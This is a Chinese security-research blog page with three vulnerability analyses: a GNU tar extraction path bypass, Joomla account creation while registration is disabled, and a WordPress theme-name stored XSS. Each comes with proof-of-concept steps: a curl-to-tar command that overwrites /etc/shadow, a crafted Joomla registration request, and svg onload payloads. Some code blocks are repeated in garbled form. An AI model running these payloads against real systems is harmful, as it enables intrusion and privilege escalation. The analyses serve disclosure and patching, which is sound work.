作者：kk | Categories:安全研究、技术分享 | Tags:

没有评论

GNU tar 解压路径绕过漏洞(CVE-2016-6321) 分析

2016-11-10

Author: LG(知道创宇404安全实验室) Date: 2016-11-09

0x00 漏洞概述

1.漏洞简介

GNU tar文档管理命令是Linux系统下常用的一个打包、压缩的命令。经 CSS（FSC1V Cyber Security Services）团队的研究员 Harry Sintonen 研究发现，tar 命令在提取路径时能够被绕过，在某些情况下导致文件被覆盖。在一些特定的场景下，利用此漏洞可导致远程代码执行。

2.漏洞影响

受害者使用tar命令解压由攻击者构造的特殊 tar 包时，tar 包不会解压到受害者制定的目标路径，而是被解压到攻击者指定的目录位置。

3.影响范围

从GNU tar 1.14 to 1.29 (包含1.29) 影响包括 Red Hat，Alphine Linux，Red Star OS以及其他所有使用 GNU tar 的 Linux 系统。

0x01 漏洞详情

1. 漏洞检测

方法一：

漏洞发现者给出了示例 PoC，用户可用其自检。 (该方法会覆盖用户帐号密码，导致 root 用户密码为空，建议使用实验环境测试或者采用方法二)

curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd
cat etc/shadow

1 2	curl https://sintonen.fi/advisories/tar-poc.tar \| tar xv etc/motd cat etc/shadow

示例poc：

示例poc中含有一个文件shadow，路径为etc/motd/../etc/shadow。在根目录下解压该包，由于漏洞的影响，../前面的内容给去掉了，路径文件名只剩下etc/shadow，原有etc/shadow文件就被其覆盖了。

方法二：

访问https://sintonen.fi/advisories/tar-poc.tar下载测试tar包后在提取前重命名 tar 包内的 shadow 文件名，如重命名为 test。然后运行如下命令：

sudo -s tar -C / -xvf tar-poc.tar  etc/motd

1	sudo -s tar -C / -xvf tar-poc.tar etc/motd

查看 etc 目录下，若生成了 test 文件，证明该漏洞存在。

2.具体攻击场景

以下为漏洞发现者提供的实际攻击场景

1.攻击者可以用这种手段诱使用户替换一些重要的文件，例如 .ssh/authorized_keys ， .bashrc , .bash_logout , .profile, .subversion或 .anyconnect

user@host:~$ dpkg --fsys-tarfile evil.deb | tar -xf - \
--wildcards 'blurf*'
tar: Removing leading `blurf/../' from member names
user@host:~$ cat .ssh/authorized_keys
ssh-rsa AAAAB3...nU= mrrobot@fsociety
user@host:~$

user@host:~$ dpkg --fsys-tarfile evil.deb | tar -xf - \

--wildcards 'blurf*'

tar: Removing leading `blurf/../' from member names

user@host:~$ cat .ssh/authorized_keys

ssh-rsa AAAAB3...nU= mrrobot@fsociety

user@host:~$

2.有一些从 web 应用或者其它类似来源自动解压文件的脚本，这些脚本一般会以 setuid root 权限执行，通常这类脚本的解压命令如下：

#tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

1	#tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

在这种情况下，攻击者可以重写/var/spoon/cron/crontabs/root以获取 root 身份的代码执行能力；也可以将可能被 root 身份执行的二进制文件替换成一个有后门的版本；或者投放一个 setuid root 的二进制文件，等待被管理员执行，使攻击者有机会获取 root 权限。

3.以 root 身份执行解压命令也可能被攻击。例如上文中提到覆写/etc/shadow的例子

如果--exclude 规则与--anchored 选项同时使用，那么即使手动加了--exclude 规则也没有用，例如：

tar -C / -xvf tar-poc.tar --anchored --exclude etc/shadow

1	tar -C / -xvf tar-poc.tar --anchored --exclude etc/shadow

在两种情况下，攻击者都成功地把/etc/test替换成了任意内容。

不过，在实际利用这个漏洞时，攻击者需要首先知道一些特定的前导信息，例如解压命令执行时实际在命令行下指定的路径名，毕竟在构造攻击 tar 包时 “../” 序列之前的路径前缀需要符合 tar 命令中所输入的路径，攻击才能奏效。

3.漏洞分析

根据漏洞发现者的分析，在lib/paxnames.c文件中，有一个safernamesuffix()函数，这个函数取代了1.13版本的检查机制。

....
char *safer_name_suffix (char const *file_name, bool link_target,bool absolute_names)
{
    char const *p;
    if (absolute_names)
        p = file_name;
    else
    {
        /* Skip file system prefixes, leading file name components that contain"..", and leading slashes.  */
        size_t prefix_len = FILE_SYSTEM_PREFIX_LEN (file_name);
        for (p = file_name + prefix_len; *p; )
        {
            if (p[0] == '.' && p[1] == '.' && (ISSLASH (p[2]) || !p[2]))
                prefix_len = p + 2 - file_name;
            do
            {
                char c = *p++;
                if (ISSLASH (c))
                    break;
            }while (*p);
        }
        for (p = file_name + prefix_len; ISSLASH (*p); p++)
            continue;
        prefix_len = p - file_name;
        if (prefix_len)
        {
            const char *prefix;
            if (hash_string_insert_prefix (&prefix_table[link_target], file_name,prefix_len, &prefix))
            {
                static char const *const diagnostic[] =
                {
                    N_("Removing leading `%s' from member names"),
                    N_("Removing leading `%s' from hard link targets")
                };
                WARN ((0, 0, _(diagnostic[link_target]), prefix));
            }
        }
    }
    ….
}

....

char *safer_name_suffix (char const *file_name, bool link_target,bool absolute_names)

{

char const *p;

if (absolute_names)

p = file_name;

else

{

/* Skip file system prefixes, leading file name components that contain"..", and leading slashes. */

size_t prefix_len = FILE_SYSTEM_PREFIX_LEN (file_name);

for (p = file_name + prefix_len; *p; )

{

if (p[0] == '.' && p[1] == '.' && (ISSLASH (p[2]) || !p[2]))

prefix_len = p + 2 - file_name;

{

char c = *p++;

if (ISSLASH (c))

break;

}while (*p);

}

for (p = file_name + prefix_len; ISSLASH (*p); p++)

continue;

prefix_len = p - file_name;

if (prefix_len)

{

const char *prefix;

if (hash_string_insert_prefix (&prefix_table[link_target], file_name,prefix_len, &prefix))

{

static char const *const diagnostic[] =

{

N_("Removing leading `%s' from member names"),

N_("Removing leading `%s' from hard link targets")

};

WARN ((0, 0, _(diagnostic[link_target]), prefix));

}

….

}

从代码注释可以看出，如果absolute_names变量为1，将 filename 赋值给 p 继续.反之若为 0 则将文件名中文件系统的前缀给去掉，并且也会对 filename 进行一些安全检查。因此，当 tar 解包时若文件名中包含“../”， safernamesuffix 函数会删除"../"及其之前的部分，将其与解压目录路径变为相对关系。这么做的目的是在兼顾文件名的安全性时保证文件的提取，而不是之前版本中改动的跳过含有恶意文件名的文件。在经过长达13年的应用后，这个漏洞终于被 Harry Sintonen 发现并公布出来。

于是，笔者研究了这个漏洞相关的发展历史。 tar所有版本下载链接发现：

tar通过 src/extarct.c 提取文件
extract.c Revision 1.35 前未加入安全检测，可以通过“../”字符串直接绕过解压路径问题，并将文件写到任意位置
extract.c Revision 1.35 加入安全检测，会警告压缩文件文件名中存在“..”字符串，并且会跳过不去处理这些文件
extract.c Revision 1.47引入 safernamesuffix 函数 - tar 1.16版本后，extract.c文件代码重构，在lib/paxnames.c 文件中定义 safernamesuffix 函数

然后笔者继续深入，通过tar官网extract.c文件更新列表对比，从源代码分析 tar 的安全检测行为。

1999/12/13 commit 前后对比

Revision 1.35官方tag中有一条： ++(extractarchive): By default, warn about ".." in member names, and skip them.++ 即Revision 1.35加入了（extractarchive）：默认情况下，在成员名称中警告“..”，并跳过它们

上图中，绿色代码区的功能就填补了之前安全检测的空白。它首先遍历 CURRENTFILENAME，如果存在".."就会警告"Member name contains'..'"，然后跳过这些文件，不去处理它们。而左边的灰色空白区域表明之前的版本缺少安全检测，"../"字符串就能绕过解压路径将文件写到任意位置。

2003/07/05 commit 前后对比

在Revision 1.47官方 tag 中： ++(extractarchive): Use safername_suffix rather than rolling our own.++ 这就是漏洞初始出现的位置了。

通过代码对比我们可以看到，更新的版本使用 safernamesuffix 函数来替代了开发者自己写的规则。

4.补丁分析

官方补丁地址 GNU tar修复了该漏洞，将安全检测机制重新替换回了 extract.c Revision 1.35的规则。

0x02 修复方案

更新补丁

http://git.savannah.gnu.org/cgit/tar.git/commit/?id=7340f67b9860ea0531c1450e5aa261c50f67165d

0x03 参考

https://www.seebug.org/vuldb/ssvid-92524

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=842339

https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt

https://sintonen.fi/advisories/tar-extract-pathname-bypass.patch

https://www.gnu.org/software/tar/

http://cvs.savannah.gnu.org/viewvc/tar/tar/src/extract.c?view=log&pathrev=release115_1#rev1.47

作者：kk | Categories:安全研究、技术分享 | Tags:

没有评论

Joomla未授权创建用户漏洞(CVE-2016-8870) 分析

2016-10-26

Author: p0wd3r (知道创宇404安全实验室) Date: 2016-10-26

0x00 漏洞概述

1.漏洞简介

Joomla是一个自由开源的内容管理系统，近日研究者发现在其3.4.4到3.6.3的版本中存在两个漏洞：CVE-2016-8869，CVE-2016-8870。我们在这里仅分析CVE-2016-8870，利用该漏洞，攻击者可以在网站关闭注册的情况下注册用户。Joomla官方已对此漏洞发布升级公告。

2.漏洞影响

网站关闭注册的情况下仍可创建用户，默认状态下用户需要用邮件激活，但需要开启注册功能才能激活。

3.影响版本

3.4.4 to 3.6.3

0x01 漏洞复现

1. 环境搭建

wget https://github.com/joomla/joomla-cms/releases/download/3.6.3/Joomla_3.6.3-Stable-Full_Package.tar.gz

1	wget https://github.com/joomla/joomla-cms/releases/download/3.6.3/Joomla_3.6.3-Stable-Full_Package.tar.gz

解压后放到服务器目录下，例如/var/www/html

创建个数据库：

docker run --name joomla-mysql -e MYSQL_ROOT_PASSWORD=hellojoomla -e MYSQL_DATABASE=jm -d mysql

1	docker run --name joomla-mysql -e MYSQL_ROOT_PASSWORD=hellojoomla -e MYSQL_DATABASE=jm -d mysql

最后访问服务器路径进行安装即可。

2.漏洞分析

在存在漏洞的版本中我们可以看到一个有趣的现象，即存在两个用于用户注册的方法：

位于components/com_users/controllers/registration.php中的UsersControllerRegistration::register()
位于components/com_users/controllers/user.php中的UsersControllerUser::register()

我们对比一下代码：

UsersControllerRegistration::register():

public function register()
    {
        // Check for request forgeries.
        JSession::checkToken() or jexit(JText::_('JINVALID_TOKEN'));

        // If registration is disabled - Redirect to login page.
        if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0)
        {
            $this->setRedirect(JRoute::_('index.php?option=com_users&view=login', false));

            return false;
        }

        $app   = JFactory::getApplication();
        $model = $this->getModel('Registration', 'UsersModel');

        // Get the user data.
        $requestData = $this->input->post->get('jform', array(), 'array');

        // Validate the posted data.
        $form = $model->getForm();

        ...
    }

public function register()

{

// Check for request forgeries.

JSession::checkToken() or jexit(JText::_('JINVALID_TOKEN'));

// If registration is disabled - Redirect to login page.

if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0)

{

$this->setRedirect(JRoute::_('index.php?option=com_users&view=login', false));

return false;

}

$app = JFactory::getApplication();

$model = $this->getModel('Registration', 'UsersModel');

// Get the user data.

$requestData = $this->input->post->get('jform', array(), 'array');

// Validate the posted data.

$form = $model->getForm();

...

}

UsersControllerUser::register():

public function register()
    {
        JSession::checkToken('post') or jexit(JText::_('JINVALID_TOKEN'));

        // Get the application
        $app = JFactory::getApplication();

        // Get the form data.
        $data = $this->input->post->get('user', array(), 'array');

        // Get the model and validate the data.
        $model  = $this->getModel('Registration', 'UsersModel');

        $form = $model->getForm();

        ...
    }

public function register()

{

JSession::checkToken('post') or jexit(JText::_('JINVALID_TOKEN'));

// Get the application

$app = JFactory::getApplication();

// Get the form data.

$data = $this->input->post->get('user', array(), 'array');

// Get the model and validate the data.

$model = $this->getModel('Registration', 'UsersModel');

$form = $model->getForm();

...

}

可以看到相对于UsersControllerRegistration::register()，UsersControllerUser::register()的实现中并没有这几行代码：

// If registration is disabled - Redirect to login page.
if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0)
{
    $this->setRedirect(JRoute::_('index.php?option=com_users&view=login', false));

    return false;
}

// If registration is disabled - Redirect to login page.

if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0)

{

$this->setRedirect(JRoute::_('index.php?option=com_users&view=login', false));

return false;

}

这几行代码是检查是否允许注册，也就是说如果我们可以用UsersControllerUser::register()这个方法来进行注册就可以绕过这个检测。

通过测试可知正常的注册使用的是UsersControllerRegistration::register()，请求包如下：

POST /index.php/component/users/?task=registration.register HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI
...
Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="jform[name]"

tomcat
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="jform[username]"

tomcat
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="jform[password1]"

tomcat
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="jform[password2]"

tomcat
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="jform[email1]"

tomcat@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="jform[email2]"

tomcat@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="task"

registration.register
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="yourtoken"

1
------WebKitFormBoundaryefGhagtDbsLTW5qI--

POST /index.php/component/users/?task=registration.register HTTP/1.1

...

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI

...

Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="jform[name]"

tomcat

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="jform[username]"

tomcat

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="jform[password1]"

tomcat

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="jform[password2]"

tomcat

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="jform[email1]"

tomcat@my.local

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="jform[email2]"

tomcat@my.local

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="option"

com_users

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="task"

registration.register

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="yourtoken"

------WebKitFormBoundaryefGhagtDbsLTW5qI--

虽然正常注册并没有使用UsersControllerUser::register()，但是并不代表我们不能使用。阅读代码可知，只要将请求包进行如下修改即可使用存在漏洞的函数进行注册：

registration.register -> user.register
jform[*] -> user[*]

所以完整的复现流程如下：

首先在后台关闭注册功能，关闭后首页没有注册选项：
然后通过访问index.php抓包获取cookie，通过看index.php源码获取token：

构造注册请求：

POST /index.php/component/users/?task=registration.register HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI
...
Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[name]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[username]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password1]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password2]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email1]"

attacker@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email2]"

attacker@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="yourtoken"

1
------WebKitFormBoundaryefGhagtDbsLTW5qI--

POST /index.php/component/users/?task=registration.register HTTP/1.1

...

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI

...

Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="user[name]"

attacker

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="user[username]"

attacker

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="user[password1]"

attacker

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="user[password2]"

attacker

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="user[email1]"

attacker@my.local

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="user[email2]"

attacker@my.local

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="option"

com_users

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="task"

user.register

------WebKitFormBoundaryefGhagtDbsLTW5qI

Content-Disposition: form-data; name="yourtoken"

------WebKitFormBoundaryefGhagtDbsLTW5qI--

发包，成功注册：

2016-10-27 更新：

默认情况下，新注册的用户需要通过注册邮箱激活后才能使用。并且：

由于$data['activation']的值会被覆盖，所以我们也没有办法直接通过请求更改用户的激活状态。

2016-11-01 更新：

感谢三好学生和D的提示，可以使用邮箱激活的前提是网站开启了注册功能，否则不会成功激活。

我们看激活时的代码，在components/com_users/controllers/registration.php中第28-99行的activate函数：

public function activate()
{
    $user    = JFactory::getUser();
    $input   = JFactory::getApplication()->input;
    $uParams = JComponentHelper::getParams('com_users');
    ...

    // If user registration or account activation is disabled, throw a 403.
    if ($uParams->get('useractivation') == 0 || $uParams->get('allowUserRegistration') == 0)
    {
        JError::raiseError(403, JText::_('JLIB_APPLICATION_ERROR_ACCESS_FORBIDDEN'));

        return false;
    }

    ...
}

public function activate()

{

$user = JFactory::getUser();

$input = JFactory::getApplication()->input;

$uParams = JComponentHelper::getParams('com_users');

...

// If user registration or account activation is disabled, throw a 403.

if ($uParams->get('useractivation') == 0 || $uParams->get('allowUserRegistration') == 0)

{

JError::raiseError(403, JText::_('JLIB_APPLICATION_ERROR_ACCESS_FORBIDDEN'));

return false;

}

...

}

这里可以看到仅当开启注册功能时才允许激活，否则返回403。

3.补丁分析

官方删除了UsersControllerUser::register()方法。

0x02 修复方案

升级到3.6.4

0x03 参考

https://www.seebug.org/vuldb/ssvid-92496

https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html

http://www.fox.ra.it/technical-articles/how-i-found-a-joomla-vulnerability.html

https://www.youtube.com/watch?v=Q_2M2oJp5l4

作者：kk | Categories:安全研究、技术分享 | Tags:

没有评论

WordPress <= 4.6.1 使用主题文件触发存储型XSS 漏洞分析

2016-10-11

Author: p0wd3r (知道创宇404安全实验室) Date: 2016-10-08

0x00 漏洞概述

1.漏洞简介

WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统，近日研究者发现在其<=4.6.1版本中，通过上传恶意构造的主题文件可以触发一个后台存储型XSS漏洞。通过该漏洞，攻击者可以在能够上传主题文件的前提下执行获取管理员Cookie等敏感操作。

2.漏洞影响

在能够上传主题文件的前提下执行获取管理员Cookie等XSS可以进行的攻击，实际的攻击场景有以下两种：

攻击者诱导管理员上传恶意构造的主题文件，且管理员并没有对文件进行检查
攻击者拥有管理员权限可以直接上传主题文件，但既然已经有管理员权限再进行这样的攻击也就多此一举了

3.影响版本

<= 4.6.1

0x01 漏洞复现

1. 环境搭建

docker pull wordpress:4.6.1  
docker pull mysql  
docker run --name wp-mysql -e MYSQL_ROOT_PASSWORD=hellowp -e MYSQL_DATABASE=wp -d mysql  
docker run --name wp --link wp-mysql:mysql -d wordpress

docker pull wordpress:4.6.1

docker pull mysql

docker run --name wp-mysql -e MYSQL_ROOT_PASSWORD=hellowp -e MYSQL_DATABASE=wp -d mysql

docker run --name wp --link wp-mysql:mysql -d wordpress

2.漏洞分析

我们先随便下载一个主题：

wget https://downloads.wordpress.org/theme/illdy.1.0.29.zip  
unzip -x illdy.1.0.29.zip

1 2	wget https://downloads.wordpress.org/theme/illdy.1.0.29.zip unzip -x illdy.1.0.29.zip

然后对illdy/style.css进行如下更改：

/*
Theme Name: <svg onload=alert(1234)>  
... DO NOT CHANGES HERE ...
*/

Theme Name: <svg onload=alert(1234)>

... DO NOT CHANGES HERE ...

接着更改文件夹名字再打包：

mv illdy "<svg onload=alert(5678)>"  
zip -r theme.zip "<svg onload=alert(5678)>"

1 2	mv illdy "<svg onload=alert(5678)>" zip -r theme.zip "<svg onload=alert(5678)>"

构造好之后我们登录后台上传该主题文件，同时开始动态调试。

首先进入wp-admin/includes/class-theme-installer-skin.php中第55-82行：

$name = $theme_info->display('Name');
...

if ( current_user_can( 'edit_theme_options' ) && current_user_can( 'customize' ) ) {  
    $install_actions['preview'] = '<a href="' . wp_customize_url( $stylesheet ) . '" class="hide-if-no-customize load-customize"><span aria-hidden="true">' . __( 'Live Preview' ) . '</span><span class="screen-reader-text">' . sprintf( __( 'Live Preview “%s”' ), $name ) . '</span></a>';
}
$install_actions['activate'] = '<a href="' . esc_url( $activate_link ) . '" class="activatelink"><span aria-hidden="true">' . __( 'Activate' ) . '</span><span class="screen-reader-text">' . sprintf( __( 'Activate “%s”' ), $name ) . '</span></a>';

$name = $theme_info->display('Name');

...

if ( current_user_can( 'edit_theme_options' ) && current_user_can( 'customize' ) ) {

$install_actions['preview'] = '<a href="' . wp_customize_url( $stylesheet ) . '" class="hide-if-no-customize load-customize">' . __( 'Live Preview' ) . '' . sprintf( __( 'Live Preview “%s”' ), $name ) . '</a>';

}

$install_actions['activate'] = '<a href="' . esc_url( $activate_link ) . '" class="activatelink">' . __( 'Activate' ) . '' . sprintf( __( 'Activate “%s”' ), $name ) . '</a>';

其中$theme_info的值如下：

Alt text

其中stylesheet和template的值为我们更改的文件夹名，headers.Name为更改的style.css中的Name。$theme_info中有我们可控的payload，其调用display函数后赋值给$name，$name直接与html拼接，所以关键点在display函数上，动态调试跟进到wp-includes/class-wp-theme.php中第630-646行：

public function display( $header, $markup = true, $translate = true ) {  
    $value = $this->get( $header );
    if ( false === $value ) {
        return false;
    }

    if ( $translate && ( empty( $value ) || ! $this->load_textdomain() ) )
        $translate = false;

    if ( $translate )
        $value = $this->translate_header( $header, $value );

    if ( $markup )
        $value = $this->markup_header( $header, $value, $translate );

    return $value;
}

public function display( $header, $markup = true, $translate = true ) {

$value = $this->get( $header );

if ( false === $value ) {

return false;

}

if ( $translate && ( empty( $value ) || ! $this->load_textdomain() ) )

$translate = false;

if ( $translate )

$value = $this->translate_header( $header, $value );

if ( $markup )

$value = $this->markup_header( $header, $value, $translate );

return $value;

}

由之前的调用可知，这里的$header的值为Name。首先看$this-get($header)，在wp-includes/class-wp-theme.php中第594-617行：

public function get( $header ) {  
        ...
            $this->headers_sanitized[ $header ] = $this->sanitize_header( $header, $this->headers[ $header ] );
        ...
        return $this->headers_sanitized[ $header ];
    }

public function get( $header ) {

...

$this->headers_sanitized[ $header ] = $this->sanitize_header( $header, $this->headers[ $header ] );

...

return $this->headers_sanitized[ $header ];

}

这里省略了与漏洞无关的部分，程序进入了$this->sanitize_header，在wp-includes/class-wp-theme.php第661-705行：

<span class="token keyword">private</span> <span class="token keyword">function</span> <span class="token function">sanitize_header<span class="token punctuation">(</span></span> <span class="token variable">$header</span><span class="token punctuation">,</span> <span class="token variable">$value</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span>  
    <span class="token keyword">switch</span> <span class="token punctuation">(</span> <span class="token variable">$header</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
        <span class="token keyword">case</span> <span class="token string">'Name'</span> <span class="token punctuation">:</span>
            <span class="token keyword">static</span> <span class="token variable">$header_tags</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
                <span class="token string">'abbr'</span>    <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token keyword">array</span><span class="token punctuation">(</span> <span class="token string">'title'</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token boolean">true</span> <span class="token punctuation">)</span><span class="token punctuation">,</span>
                <span class="token string">'acronym'</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token keyword">array</span><span class="token punctuation">(</span> <span class="token string">'title'</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token boolean">true</span> <span class="token punctuation">)</span><span class="token punctuation">,</span>
                <span class="token string">'code'</span>    <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token boolean">true</span><span class="token punctuation">,</span>
                <span class="token string">'em'</span>      <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token boolean">true</span><span class="token punctuation">,</span>
                <span class="token string">'strong'</span>  <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token boolean">true</span><span class="token punctuation">,</span>
            <span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token variable">$value</span> <span class="token operator">=</span> <span class="token function">wp_kses<span class="token punctuation">(</span></span> <span class="token variable">$value</span><span class="token punctuation">,</span> <span class="token variable">$header_tags</span> <span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">break</span><span class="token punctuation">;</span>
        <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token punctuation">}</span>

private function sanitize_header( $header, $value ) {

switch ( $header ) {

...

case 'Name' :

static $header_tags = array(

'abbr' => array( 'title' => true ),

'acronym' => array( 'title' => true ),

'code' => true,

'em' => true,

'strong' => true,

);

$value = wp_kses( $value, $header_tags );

break;

...

}

这里执行了Name这个分支，可以看到程序使用wp_kses对$value的值进行了过滤，仅允许$header_tags中的html符号，所以我们headers.Name的值<svg onload=alert(1234)>是不合法的，$value值被赋为空。

然后程序回到了display函数，根据动态调试可以知道程序执行了$value = $this->markup_header( $header, $value, $translate );这个条件分支，再跟进，在wp-includes/class-wp-theme.php中第720-748行：

<span class="token keyword">private</span> <span class="token keyword">function</span> <span class="token function">markup_header<span class="token punctuation">(</span></span> <span class="token variable">$header</span><span class="token punctuation">,</span> <span class="token variable">$value</span><span class="token punctuation">,</span> <span class="token variable">$translate</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span>  
    <span class="token keyword">switch</span> <span class="token punctuation">(</span> <span class="token variable">$header</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">case</span> <span class="token string">'Name'</span> <span class="token punctuation">:</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">empty<span class="token punctuation">(</span></span> <span class="token variable">$value</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span>
                <span class="token variable">$value</span> <span class="token operator">=</span> <span class="token this">$this</span><span class="token operator">-</span><span class="token operator">&gt;</span><span class="token function">get_stylesheet<span class="token punctuation">(</span></span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">break</span><span class="token punctuation">;</span>
        <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
    <span class="token keyword">return</span> <span class="token variable">$value</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

private function markup_header( $header, $value, $translate ) {

case 'Name' :

if ( empty( $value ) )

$value = $this->get_stylesheet();

break;

...

return $value;

}

这里我们看到由于$value在之前被赋为空，导致此处$value被重新赋值为了$this->get_stylesheet()，也就是值为<svg onload=alert(5678)>的stylesheet变量。最后返回的$value赋给了$name，$name再与html拼接返回给客户端，从而触发了漏洞：

这个漏洞有趣的地方在于style.css中的payload其实起到的是一个障眼法的作用，正是因为<svg onload=alert(1234)>被过滤了才使$value被赋值成了我们真正的payload<svg onload=alert(5678)>。所以在构造主题文件的时候style.css和文件夹名这两个地方都要更改。

3.补丁分析

可能是由于利用条件十分苛刻，目前Wordpress官方还没有发布补丁，最新版Wordpress仍存在该漏洞。

0x02 修复方案

在官方发布补丁前，管理员应提高安全意识，不要轻易使用来路不明的主题。

对于开发者来说建议对$name进行合法性检查，例如这样：

<span class="token variable">$allowed_html</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
    <span class="token string">'em'</span>      <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token boolean">true</span><span class="token punctuation">,</span>
    <span class="token string">'strong'</span>  <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token boolean">true</span><span class="token punctuation">,</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$name</span> <span class="token operator">=</span> <span class="token function">wp_kses<span class="token punctuation">(</span></span><span class="token variable">$name</span><span class="token punctuation">,</span> <span class="token variable">$allowed_html</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

$allowed_html = array(

'em' => true,

'strong' => true,

);

$name = wp_kses($name, $allowed_html);

0x03 参考

作者：kk | Categories:安全研究、技术分享 | Tags:

没有评论